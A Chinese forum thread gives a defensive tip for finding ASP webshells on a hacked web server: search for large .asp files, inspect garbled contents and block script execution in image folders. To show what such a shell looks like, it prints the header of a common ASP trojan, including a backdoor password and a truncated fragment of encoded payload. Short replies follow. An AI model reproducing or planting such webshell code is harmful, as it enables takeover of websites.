一种快速而高效的查找网页木马的办法
近日服务器上的网站经常被人挂网页木马,凡是网页文件最下面都被加了框架,特别的烦,用文件批量替换工具,删除了挂上的框架,但是没过多久又被挂上,后来总结了一下经验,虽然把挂的病毒代码去掉了,但是没有把挂马用的asp木马给找出来。后来发现一个非常简单的版本来找asp木马,就是利用windows自动搜索功能,文件名 *.as* 然后选择高级中的 文件大小 至少大于55KB,这样一搜就asp木马找出来了,当然找出来了,其中有一些正常asp文件,一般动网的论坛有一些文件是大于55KB的,还有就是改了名字的access数据库,先观察一下,看看那个文件的文件名比较怪异,然后打开看,如果发现里面全部是乱码,那就可以肯定是asp木马了,还有看文件存放的路径,一般asp木马都存在于存放图片的木马或者是数据库备份的文件夹里面。挨个仔细看,找出asp木马后,还要看这个木马是放在哪个目录,如果是图片目录的话,一些虚拟主机有关比执行权限,把图片文件设置成不能运行脚本的目录,这样可以防止再次被入侵。有一次我发现一个可怜的网站,抓了8个asp木马出来,各种版本的都不同,他运气也太多了,挂了那么多木马,网站文件下面堆砌了10多个框架,我还第一次遇到呢。当然还有一些比较专业的工具可以查找asp木马,不过如果你网站文件特别多的话,那就速度特别慢了,这个办法算是最快最准确的方法了。最常见的都是 框架挂马,有一次处理一个黑客站点的网站的时候遇到 js挂马,那次可特别费心,那个站长也是搞黑客的,网站还挂了教程,关于挂马的。查了半天才发现是在一个js文件中。那个算是比较高级的挂马方式了,关于css挂马的,我还没有遇到过。有遇到过的朋友可以拿出来分享一下看看。说实话,我非常佩服写第一个asp木马的人,仔细把asp木马解密出来看就发现,每个代码写的非常严谨的,可以说把asp的功能发挥到极点了。asp木马解密出来看起来也好像是乱码,不过仔细一看,排一下版就清楚了。
另外以前写过关于其他更详细的清除asp木马的文章,可以参看 [url]http://cdn.e-spirit.cn/style/info/shownews.asp?id=190[/url]
常见的asp木马一般开头都这个样子
<%@ LANGUAGE = VBScript.Encode %>
<%
UserPass="zzs7758" //后门密码的
mName="。" ///后门版全
Copyright="注:请勿用于非法用途,否则后果作者概不负责"
#@~^AAUAAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XO@#@&?;A,?46S2I"c#@#@&P,(WPADMPPC3H@#@&~P,~IM?E@!(D@*@!C,t.+6xELC7lkmDbwDltb/OWMX 8mm3vbB@*@!4M@*'x(/aiEP'~AD.R93/;D(KDkrH~LPE@!JC@*@!8M@*r@#@&,P,~+"D md2C]=I+kKr ?+cosEUt@#@&~PnU9Prs@#@&2gf~j!A@#@&d!4~DMdv?PM#@#@&d"+UKW /3RSI(O`?D]#@#@&+ [~?`A@#@&ojH/:k61,]+hlO4v?#@#@&,P.+a):tx"+hSb12vd~r-E~r-wE*@#@&UN,sE ^Oq}x@#@&WjU/DqGx,]IwCO4`/b@#@&P~IM3hbP4'"2w^b1n`k~E-'JSE'J#@#@&+gNP6iUZDkKx@#@&j4b?Cx{E╋╁@*M+OUmz@!@*mz@!回返 :) 楼主辛苦了, 查找大马就用这方法很管用,查一句话网马,和小马就不行了 还是做好安全防范才是王道
如何防止网络嗅探远程登录密码,arp攻击,被植木马?
如何防止网站被黑,服务器被黑?
如何让网站不再挂网马?
朋友被以上问题困扰可以联系本人
发现漏洞,修补漏洞--亡羊补牢,越快越好 嘻嘻
路过 路过
页:
[1]